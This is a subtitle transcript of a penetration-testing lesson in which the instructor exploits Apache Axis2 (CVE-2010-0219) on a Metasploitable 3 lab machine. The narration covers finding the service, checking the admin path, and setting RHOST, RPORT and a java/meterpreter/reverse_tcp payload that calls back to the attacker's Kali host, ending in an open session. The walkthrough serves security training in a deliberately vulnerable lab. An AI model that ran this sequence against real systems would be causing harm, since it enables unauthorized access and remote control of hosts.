1
00:00:00,430 --> 00:00:03,790
So list the HTTP services on Metasploitable 3 again.

2
00:00:08,410 --> 00:00:13,660
And this time you can work on the service that runs on port 8282.

3
00:00:15,450 --> 00:00:23,250
Now it's supposed to be an HTTP service, so I will try to reach it from my browser to display the application

4
00:00:23,250 --> 00:00:24,390
that runs on this port.

5
00:00:26,590 --> 00:00:30,250
And this is an Apache Tomcat web interface.

6
00:00:32,060 --> 00:00:39,860
So at first, I think that the default Tomcat username and password might probably work well here.

7
00:00:41,250 --> 00:00:45,330
But unfortunately, they don't, so let's find another way.

8
00:00:45,690 --> 00:00:46,680
There's always another way.

9
00:00:47,730 --> 00:00:50,790
And we'll go back to msfconsole.

10
00:00:52,660 --> 00:01:02,750
So, of course, you can always check the Nessus result for port 8282: -p 8282, and then

11
00:01:02,770 --> 00:01:03,400
10.10.10.10.

12
00:01:06,210 --> 00:01:12,210
Now, have a look at that; there are some findings that you should analyze pretty carefully.

13
00:01:13,580 --> 00:01:20,660
When you look into the vulnerability list, you see this line with Apache Axis2 Detection.

14
00:01:22,130 --> 00:01:24,260
So this finding is relatively new.

15
00:01:25,340 --> 00:01:27,800
So let's open up your browser and look for

16
00:01:28,930 --> 00:01:30,730
Axis2 exploit.

17
00:01:34,180 --> 00:01:38,890
And click here to display the CVE codes about Apache Axis2.

18
00:01:40,150 --> 00:01:41,790
Right, so there are six codes here.

19
00:01:43,200 --> 00:01:47,610
And, as you also can see from the score, the last one is really high.

20
00:01:48,740 --> 00:01:52,070
So let's look for this CVE code in Metasploit.

21
00:01:53,310 --> 00:01:56,070
But you can always widen your search to search all.

22
00:01:57,320 --> 00:01:59,540
So let's go back into msfconsole.

23
00:02:01,190 --> 00:02:09,110
And search for CVE code 2010-0219, and there are two modules for this

24
00:02:09,110 --> 00:02:09,470
code.

25
00:02:10,740 --> 00:02:16,650
Now, if you are familiar with the MSF structure, you can immediately see the first one is a brute

26
00:02:16,650 --> 00:02:24,740
force module to detect a login, OK, and the second one is an exploit with such login information.

27
00:02:26,430 --> 00:02:32,700
So let's have a look at the module information: info and the exploit module name.

28
00:02:35,270 --> 00:02:39,140
And if you look at the variable section, you will see a PATH variable.

29
00:02:40,130 --> 00:02:44,540
So until now, you haven't verified if there is a vulnerability.

30
00:02:46,050 --> 00:02:49,140
So to be sure that that's the exploit we want to use,

31
00:02:50,070 --> 00:02:54,570
let's go to that path from my browser to verify the path.

32
00:02:55,820 --> 00:02:58,190
So let's go ahead and do this; open your browser now.

33
00:02:59,050 --> 00:03:08,110
And go to the address 10.10.10.10:8282/axis2.

34
00:03:09,380 --> 00:03:10,310
And sure enough.

35
00:03:11,260 --> 00:03:18,640
So let's click on the administration link and, well, I think this is the administration page.

36
00:03:19,900 --> 00:03:21,640
So let's go back to msfconsole.

37
00:03:23,280 --> 00:03:24,660
And you can use this exploit.

38
00:03:27,430 --> 00:03:28,540
Show the options.

39
00:03:30,140 --> 00:03:34,160
Set RHOST to 10.10.10.10.

40
00:03:35,340 --> 00:03:38,720
Set RPORT to 8282.

41
00:03:39,940 --> 00:03:42,070
Show available payloads for this module.

42
00:03:43,930 --> 00:03:46,600
OK, set payload to

43
00:03:47,510 --> 00:03:51,340
java/meterpreter/reverse_tcp.

44
00:03:52,220 --> 00:03:56,720
Set LHOST for this reverse connection to my Kali IP.

45
00:03:57,630 --> 00:04:00,750
And I'll set LPORT to 8282.

46
00:04:01,990 --> 00:04:08,830
So I'm pretty sure I set everything, but just to be sure, let's check one more time: show the options

47
00:04:08,830 --> 00:04:13,810
again, and everything looks good, so let's exploit.

48
00:04:15,910 --> 00:04:23,350
And as you see, the module logs in with the default Axis user information, and, you know, it's a good

49
00:04:23,350 --> 00:04:29,260
thing to get into the practice of: you can add this information to your dictionary file for

50
00:04:29,260 --> 00:04:30,130
Metasploitable 3.

51
00:04:31,560 --> 00:04:33,270
So the session opened.

52
00:04:34,200 --> 00:04:38,070
So let's getuid and sysinfo.

53
00:04:39,730 --> 00:04:44,650
And you've got another successful session on Metasploitable 3. Good job.